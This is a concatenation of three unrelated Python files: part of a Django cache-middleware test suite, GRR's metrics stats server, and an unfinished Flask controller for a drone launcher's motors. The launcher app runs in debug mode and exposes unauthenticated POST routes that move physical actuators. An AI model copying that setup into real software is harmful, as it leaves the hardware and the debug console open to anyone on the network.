key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
        # change the language again
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
        # change the language again
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
        Ensure the constructor correctly distinguishes between the use of
        CacheMiddleware as middleware and as a view decorator, and sets
        attributes appropriately in each case.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
    Tests various headers with TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway, but the ETag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(SimpleTestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(SimpleTestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
stats_server.py
|
#!/usr/bin/env python
"""Stats server implementation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import collections
import errno
import json
import logging
import socket
import threading
from future.builtins import range
from future.moves.urllib import parse as urlparse
from future.utils import iteritems
from http import server as http_server
import prometheus_client
from grr_response_core import config
from grr_response_core.lib import registry
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import stats as rdf_stats
from grr_response_core.stats import stats_collector_instance
from grr_response_server import base_stats_server
def _JSONMetricValue(metric_info, value):
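  # EVENT metrics carry distributions, so they are expanded into their sum,
  # count and bin heights for JSON serialization; all other metric types are
  # returned as plain values.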
if metric_info.metric_type == rdf_stats.MetricMetadata.MetricType.EVENT:
return dict(
sum=value.sum,
counter=value.count,
bins_heights=collections.OrderedDict(value.bins_heights))
else:
return value
def BuildVarzJsonString():
"""Builds Varz JSON string from all stats metrics."""
results = {}
for name, metric_info in iteritems(
stats_collector_instance.Get().GetAllMetricsMetadata()):
info_dict = dict(metric_type=metric_info.metric_type.name)
if metric_info.value_type:
info_dict["value_type"] = metric_info.value_type.name
if metric_info.docstring:
info_dict["docstring"] = metric_info.docstring
if metric_info.units:
info_dict["units"] = metric_info.units.name
if metric_info.fields_defs:
info_dict["fields_defs"] = []
for field_def in metric_info.fields_defs:
info_dict["fields_defs"].append((field_def.field_name,
utils.SmartStr(field_def.field_type)))
value = {}
all_fields = stats_collector_instance.Get().GetMetricFields(name)
for f in all_fields:
joined_fields = ":".join(utils.SmartStr(fname) for fname in f)
value[joined_fields] = _JSONMetricValue(
metric_info,
stats_collector_instance.Get().GetMetricValue(name, fields=f))
else:
value = _JSONMetricValue(
metric_info,
stats_collector_instance.Get().GetMetricValue(name))
results[name] = dict(info=info_dict, value=value)
encoder = json.JSONEncoder()
return encoder.encode(results)
class StatsServerHandler(http_server.BaseHTTPRequestHandler):
"""Default stats server implementation."""
def do_GET(self): # pylint: disable=g-bad-name
if self.path == "/prometheus_metrics":
# TODO: This code is copied from
# prometheus_client.MetricsHandler. Because MetricsHandler is an old-style
# class and dispatching to different BaseHTTPRequestHandlers is
# surprisingly hard, we copied the code instead of calling it. After a
# deprecation period, the /varz route will be removed and
# StatsServerHandler can be replaced by prometheus_client.MetricsHandler.
pc_registry = prometheus_client.REGISTRY
params = urlparse.parse_qs(urlparse.urlparse(self.path).query)
encoder, content_type = prometheus_client.exposition.choose_encoder(
self.headers.get("Accept"))
if "name[]" in params:
pc_registry = pc_registry.restricted_registry(params["name[]"])
try:
output = encoder(pc_registry)
except:
self.send_error(500, "error generating metric output")
raise
self.send_response(200)
self.send_header("Content-Type", content_type)
self.end_headers()
self.wfile.write(output)
elif self.path == "/varz":
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(BuildVarzJsonString())
elif self.path == "/healthz":
self.send_response(200)
else:
self.send_error(404, "Not found")
class StatsServer(base_stats_server.BaseStatsServer):
"""A statistics server that exposes a minimal, custom /varz route."""
def __init__(self, port):
"""Instantiates a new StatsServer.
Args:
port: The TCP port that the server should listen to.
"""
super(StatsServer, self).__init__(port)
self._http_server = None
self._server_thread = None
def Start(self):
"""Start HTTPServer."""
try:
self._http_server = http_server.HTTPServer(("", self.port),
StatsServerHandler)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
raise base_stats_server.PortInUseError(self.port)
else:
raise
self._server_thread = threading.Thread(
target=self._http_server.serve_forever)
self._server_thread.daemon = True
self._server_thread.start()
def Stop(self):
"""Stops serving statistics."""
self._http_server.shutdown()
self._server_thread.join()
class StatsServerInit(registry.InitHook):
"""Starts up a varz server after everything is registered."""
def RunOnce(self):
"""Main method of this registry hook.
    The StatsServer implementation may be overridden. If there is a
    "stats_server" module present in the grr/local directory, then
    grr.local.stats_server.StatsServer will be used instead of the default
    implementation.
"""
# Figure out which port to use.
port = config.CONFIG["Monitoring.http_port"]
if not port:
logging.info("Monitoring server disabled.")
return
# TODO(user): Implement __contains__ for GrrConfigManager.
max_port = config.CONFIG.Get("Monitoring.http_port_max", None)
if max_port is None:
      # Use the same number of available ports as the AdminUI. If the AdminUI
      # has 10 ports available, the stats server needs 10 as well.
adminui_max_port = config.CONFIG.Get("AdminUI.port_max",
config.CONFIG["AdminUI.port"])
max_port = port + adminui_max_port - config.CONFIG["AdminUI.port"]
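      # Example with hypothetical values: AdminUI.port=8000, AdminUI.port_max=8009
      # and Monitoring.http_port=44449 give max_port = 44449 + 8009 - 8000 = 44458,
      # i.e. the same ten-port window as the AdminUI.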
try:
# pylint: disable=g-import-not-at-top
from grr_response_server.local import stats_server
# pylint: enable=g-import-not-at-top
server_cls = stats_server.StatsServer
logging.debug("Using local StatsServer")
except ImportError:
logging.debug("Using default StatsServer")
server_cls = StatsServer
for port in range(port, max_port + 1):
try:
logging.info("Starting monitoring server on port %d.", port)
server_obj = server_cls(port)
server_obj.Start()
return
except base_stats_server.PortInUseError as e:
if e.port < max_port:
logging.info(e.message)
continue
raise
|
dronelauncher_python1.py
|
#DRONE LAUNCHER
#Import modules
from flask import Flask, render_template, request, jsonify
from roboclaw import Roboclaw
import time
import socket
from neopixel import *
import argparse
import threading
import thermo
# LED strip configuration:
LED_COUNT = 60 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
#LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800kHz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
# Define functions which animate LEDs in various ways.
def colorWipe(strip, color, wait_ms=50):
"""Wipe color across display a pixel at a time."""
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
strip.show()
time.sleep(wait_ms/1000.0)
def theaterChase(strip, color, wait_ms=50, iterations=10):
"""Movie theater light style chaser animation."""
for j in range(iterations):
for q in range(3):
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, color)
strip.show()
time.sleep(wait_ms/1000.0)
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, 0)
def wheel(pos):
"""Generate rainbow colors across 0-255 positions."""
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
def rainbow(strip, wait_ms=20, iterations=1):
"""Draw rainbow that fades across all pixels at once."""
for j in range(256*iterations):
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel((i+j) & 255))
strip.show()
time.sleep(wait_ms/1000.0)
def rainbowCycle(strip, wait_ms=20, iterations=5):
"""Draw rainbow that uniformly distributes itself across all pixels."""
for j in range(256*iterations):
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255))
strip.show()
time.sleep(wait_ms/1000.0)
def theaterChaseRainbow(strip, wait_ms=50):
"""Rainbow movie theater light style chaser animation."""
for j in range(256):
for q in range(3):
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, wheel((i+j) % 255))
strip.show()
time.sleep(wait_ms/1000.0)
for i in range(0, strip.numPixels(), 3):
strip.setPixelColor(i+q, 0)
#Open serial port
#Linux comport name
#rc = Roboclaw("/dev/ttyACM0",115200)
#Windows comport name
rc = Roboclaw("COM8",115200)
rc.Open()
#Declare variables
#Specify IP address and port for the server
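#The expression below first looks for a non-loopback address among the host's own
#interfaces; if none is found it opens a throwaway UDP socket towards 8.8.8.8 to
#discover the outbound interface address, and finally falls back to "no IP found"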
host=(([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2] if not ip.startswith("127.")] or [[(s.connect(("8.8.8.8", 53)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]]) + ["no IP found"])[0]
port=5001
address = 0x80 #Controller 1, M1=Pitch, M2=Rotation
address_2 = 0x81 #Controller 2, M1=Lift, M2=Launch
pitch_pulses=355000 #Encoder pulses from the linear actuator
pitch_length=90.0 #Degrees
pitch_speed_pulses=7000 #Pulses per second
pitch_speed_manual=127 #From 0 to 127
pitch_ready=70.0 #Pitch degrees for the launch (temporary)
rotation_pulses=950000 #Encoder pulses from the rotation motor
rotation_length=180.0 #Degrees
rotation_speed_pulses=16000 #Pulses per second
rotation_speed_manual=15 #From 0 to 127
rotation_ready=10.0 #Rotation degrees for the launch (temporary)
lift_pulses=19000 #Encoder pulses from the lifting column
lift_length=130.0 #cm
lift_speed_pulses=420 #Pulses per second
lift_speed_manual=127 #From 0 to 127
lift_ready=lift_length #Lift length for the launch (temporary)
launch_pulses=14800 #Encoder pulses from the launch motor
launch_length=111.0 #cm
launch_speed_pulses=6*13400 #Pulses per second during launch (145000 max) (13400 pulses/m)
launch_speed_pulses_slow=2500 #Pulses per second during preparation
launch_speed_manual=12 #From 0 to 127
launch_acceleration=(launch_speed_pulses**2)/13400 #Acceleration during launch (pulses/second2)
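#With 13400 pulses per metre, a = v**2/13400 implies v**2/(2*a) = 6700 pulses,
#so (assuming constant acceleration from rest) the belt reaches full launch
#speed after roughly half a metre of travel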
launch_max_speed=10 #Maximum launch speed
launch_min_speed=1 #Minimum launch speed
launch_max_acceleration=48 #Maximum launch acceleration
launch_min_acceleration=1 #Minimum launch acceleration
launch_standby=8000 #Drone position during stand-by
launch_mount=17000 #Drone position during mounting
launch_break=21000 #Belt position during braking
launch_bottom=0 #Drone position at the back part of the capsule
launch_connect=2190 #Belt position for touching the upper part
encoders_ready = 0 #At the beginning, the encoders are not ready
#Create an instance of the Flask class for the web app
app = Flask(__name__)
app.debug = True
#Render HTML template
@app.route("/")
def index():
return render_template('dronelauncher_web.html')
#Motor controller functions
#rc.ForwardM2(address, rotation_speed_manual)
#rc.ForwardM2(address,0) #Both commands are used to avoid rotation
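#The position/min/max/standby/prepare routes below all follow the same pattern:
#convert the requested position into encoder pulses by linear scaling, read the
#current encoder count, and command a signed SpeedDistance move for the
#difference, immediately followed by a zero-speed SpeedDistance so the
#controller does not decelerate at the end of the move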
@app.route('/app_pitch_up', methods=['POST'])
def function_pitch_up():
rc.BackwardM1(address, pitch_speed_manual)
return (''), 204 #Returns an empty response
@app.route('/app_pitch_down', methods=['POST'])
def function_pitch_down():
rc.ForwardM1(address, pitch_speed_manual)
return (''), 204
@app.route('/app_pitch_position', methods=['POST'])
def function_pitch_position():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
pitch_position = request.form.get('pitch_position', type=int)
if pitch_position > pitch_length or pitch_position < 0:
return (''), 400
elif pitch_position == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_position))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_pitch_stop', methods=['POST'])
def function_pitch_stop():
rc.ForwardM1(address,0)
return (''), 204
@app.route('/app_rotation_right', methods=['POST'])
def function_rotation_right():
rc.ForwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_left', methods=['POST'])
def function_rotation_left():
rc.BackwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_position', methods=['POST'])
def function_rotation_position():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
rotation_position = request.form.get('rotation_position', type=int)
if rotation_position > rotation_length or rotation_position < -rotation_length:
return (''), 400
elif rotation_position == 0:
rotation_objective = 0
else:
rotation_objective = int((rotation_pulses/(rotation_length/rotation_position))/2)
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_rotation_stop', methods=['POST'])
def function_rotation_stop():
rc.ForwardM2(address,0)
return (''), 204
@app.route('/app_lift_up', methods=['POST'])
def function_lift_up():
rc.ForwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_down', methods=['POST'])
def function_lift_down():
rc.BackwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_position', methods=['POST'])
def function_lift_position():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
lift_position = request.form.get('lift_position', type=int)
if lift_position > lift_length or lift_position < 0:
return (''), 400
elif lift_position == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_position))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
return (''), 204
@app.route('/app_lift_stop', methods=['POST'])
def function_lift_stop():
rc.ForwardM1(address_2,0)
return (''), 204
@app.route('/app_launch_forwards', methods=['POST'])
def function_launch_forwards():
rc.ForwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_backwards', methods=['POST'])
def function_launch_backwards():
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_position', methods=['POST'])
def function_launch_position():
    if encoders_ready == 0: #Do not execute if the encoders are not ready
return (''), 403
launch_position = request.form.get('launch_position', type=int)
if launch_position > launch_length or launch_position < 0:
return (''), 400
else:
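        #Two-stage move: first send the belt back to launch_bottom and wait until
        #the controller buffer reports idle (0x80), then advance to the requested
        #position plus the launch_connect offset (the belt position for touching
        #the upper part)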
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
buffer_2 = (0,0,0)
while(buffer_2[2]!=0x80): #Loop until all movements are completed
buffer_2 = rc.ReadBuffers(address_2)
if launch_position == 0:
launch_objective = 0
else:
launch_objective = int(launch_pulses/(launch_length/launch_position))
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual+launch_connect
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
